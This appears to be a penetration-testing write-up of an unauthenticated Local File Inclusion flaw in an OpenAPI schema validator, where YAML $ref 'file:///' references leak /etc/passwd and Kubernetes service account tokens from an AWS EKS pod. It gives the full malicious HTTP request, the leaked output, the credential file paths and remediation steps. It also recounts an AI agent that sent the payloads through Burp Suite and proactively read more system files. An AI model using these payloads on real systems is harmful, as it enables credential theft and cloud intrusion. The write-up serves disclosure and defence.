From Zero to Cloud Admin: Uncovering AWS EKS Infrastructure via Unauthenticated OpenAPI LFI
~ Vinayak R Jituri, Senior Security Analyst
“Over 60% of web applications tested in real-world engagements contain at least one high or critical vulnerability”—yet some of the most damaging issues still come from endpoints developers assume are harmless.
During a routine security assessment of api.redacted.com, a Critical severity Local File Inclusion (LFI) vulnerability was discovered within a developer-facing OpenAPI schema validation endpoint.
What made this particularly impactful was not just the vulnerability itself—but the conditions surrounding it:
- The endpoint was publicly accessible
- It required zero authentication
- And it trusted user-supplied input in a way that exposed internal file resolution logic
By exploiting how the backend parser handled YAML $ref references, it became possible to achieve arbitrary file read access on the underlying host.
This seemingly minor misconfiguration quickly escalated into a high-impact breach scenario. The vulnerability was leveraged to extract sensitive AWS EKS infrastructure data, including:
- Service Account JWT tokens
- Cluster CA certificates
- Internal AWS VPC subnet mappings
- Node topology details
As one security adage puts it:
“Attackers don’t break in—they log in… or simply ask for the wrong file.”
This case highlights how developer tooling endpoints—often overlooked in threat models—can become critical entry points into cloud-native environments.
| Property | Value |
|---|---|
| Endpoint | POST /api/v1/tools/validate |
| Protocol | HTTP/2 POST (multipart/form-data) |
| Auth Required | None (Fully Unauthenticated) |
| Root Cause | Insecure YAML parsing resolving file:/// URIs in OpenAPI $ref tags |
| Impact | Arbitrary file read → K8s credential theft → Full AWS infra mapping |
Step 1 — Recon
The endpoint POST /api/v1/tools/validate was identified as a utility that accepts OpenAPI/Swagger .yaml file uploads for schema validation.
Step 2 — Pattern Recognition
Backend parsers handling YAML/XML are historically prone to Injection and SSRF flaws. The $ref parameter was flagged as a high-value target — its job is to load data from external sources.
Step 3 — Fuzzing
A custom fuzzing script tested external entity resolution. Payloads injected into the $ref field included URLs, internal IPs, file paths, and protocol handlers.
Step 4 — The Breakthrough
A payload with:
$ref: 'file:///etc/hostname'was submitted. The parser loaded the file, and because a hostname is not a valid schema object, it reflected the raw file contents in the error response.
Confirmed: Error-Based Local File Inclusion (LFI) — unauthenticated.
To demonstrate the vulnerability, a read of /etc/passwd was executed.
Malicious HTTP Request
POST /api/v1/tools/validate HTTP/2
Host: api.redacted.com
Content-Type: multipart/form-data; boundary=----boundary123
------boundary123
Content-Disposition: form-data; name="file"; filename="api.yaml"
Content-Type: application/x-yaml
openapi: 3.0.0
info:
title: Test
version: "1.0"
servers:
- url: http://localhost
paths:
/test:
get:
responses:
'200':
description: Test
content:
application/json:
schema:
$ref: 'file:///etc/passwd'
------boundary123--Server Response
{
"success": true,
"data": {
"valid": false,
"errors": [
{
"message": "OpenAPI validation error: 'root:x:0:0:root:/root:/bin/bash\n
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n...'
is not of type 'object', 'boolean'"
}
]
}
}The server read the file from disk and returned raw contents.
Full arbitrary file read — zero authentication.
Because the application was hosted inside a Kubernetes pod, the attack was pivoted to target standard K8s service account mounts.
Extracted Sensitive Files
| # | File Path | What Was Leaked |
|---|---|---|
| 1 | /var/run/secrets/kubernetes.io/serviceaccount/token | Kubernetes SA JWT token |
| 2 | /var/run/secrets/kubernetes.io/serviceaccount/ca.crt | Cluster CA certificate |
| 3 | /etc/passwd | System user accounts |
| 4 | /etc/hosts | Pod internal IP (10.1.x.x) |
| 5 | /etc/resolv.conf | Internal DNS & cluster domains |
| 6 | /proc/self/mountinfo | Container filesystem layout |
AWS Cloud Intelligence Map
| Detail Exposed | Value |
|---|---|
| Cloud Provider | AWS EKS |
| Region | ap-south-1 (Mumbai) |
| Node Instance | ip-10-1-x-x-218.ap-south-1.compute.internal |
| VPC Subnet | 10.1.x.x/24 |
| Namespace | redacted-prod |
| Service Account | default |
| Container Runtime | containerd with overlayfs |
| CA Cert Validity | YYYY-08-27 to YYYY-08-25 |
- Zero-Barrier Entry: The endpoint requires no authentication. Any attacker can map internal AWS infrastructure with a single HTTP request.
- Credential Theft: The stolen K8s SA token + CA certificate provide valid internal credentials for cluster API authentication.
- Lateral Movement Risk: If the default SA has elevated RBAC permissions, an attacker could enumerate secrets, deploy rogue containers, or pivot into AWS.
- Full Infra Exposure: Internal IPs, VPC subnets, DNS servers, node hostnames, and container runtime details were all disclosed.
| # | Recommendation | Details |
|---|---|---|
| 1 | Restrict $ref URI Schemes | Block all absolute URIs (file://, http://). Allow only relative fragments. |
| 2 | Enforce Authentication | Require valid JWT/session tokens on the validate endpoint. |
| 3 | Suppress Error Details | Return generic errors instead of reflecting raw file contents. |
| 4 | Disable Token Auto-Mount | Set automountServiceAccountToken: false in pod spec. |
| 5 | Least Privilege SA | Replace default SA with a dedicated one having zero RBAC permissions. |
| 6 | Rotate Credentials | Rotate all K8s SA tokens in the redacted-prod namespace. |
This assessment was conducted using an AI-powered security agent connected to Burp Suite Professional via the Model Context Protocol (MCP).
Step 1 — Human Shares the Raw Request
Human: Pasted the raw HTTP request from Burp Suite — the POST /api/v1/tools/validate request with headers, cookies, and a sample YAML body.
AI Action: Parsed the request structure, identified the $ref field as an injection vector, crafted the first LFI test payload (file:///etc/hostname), sent it via Burp MCP, confirmed the LFI when the hostname was reflected, and immediately escalated to /etc/passwd.
Step 2 — Human Directs K8s Escalation
Human:
“Try /var/run/secrets/kubernetes.io/serviceaccount/token — SA token, and ca.crt — cluster CA”
AI Action: Crafted payloads for both paths, sent via Burp MCP, decoded the JWT token automatically (extracting EKS cluster ID, region, namespace, pod/node names), parsed the CA cert, and proactively read /etc/hosts, /etc/resolv.conf, and /proc/self/mountinfo to build a full infrastructure map.
Step 3 — Human Pushes for Higher Impact
Human:
“Try IRSA token path — if configured, this can be exchanged for real AWS IAM credentials.”
AI Action: Crafted and fired the IRSA payload. When the file was not found, correctly identified that IRSA is not configured on this pod and reported it as a negative finding.
Step 4 — Human Provides Fresh Auth Token
Human:
“Take this new keycloak token: eyJhbG…”
AI Action: Updated the authentication cookie in all subsequent Burp MCP requests, re-ran extractions, and correlated all findings into a unified infrastructure map.
Step 5 — Human Triggers Unauthenticated Testing
Human:
“This is going in unauth as well, check like that”
AI Action: Sent the same LFI payload via Burp MCP but stripped ALL cookies and auth headers. Server returned HTTP 200 with file contents — confirming unauthenticated access. AI updated CVSS from PR:L to PR:N, bumping the score from 7.7 to 9.3 Critical.
Step 6 — Human Requests Formal Reports
Human:
“Give me a vulnerability report according to this template…”
AI Action: Generated formal reports matching the pentest template. When human said “Make both as one”, merged them. When human corrected “We just saw K8s details, not compromised”, AI adjusted the language from “compromise” to “information disclosure”.
The human analyst drove every strategic decision.
The AI handled execution — crafting requests through Burp MCP, parsing responses, decoding JWTs, and generating reports at machine speed.
The analyst thinks, the AI executes.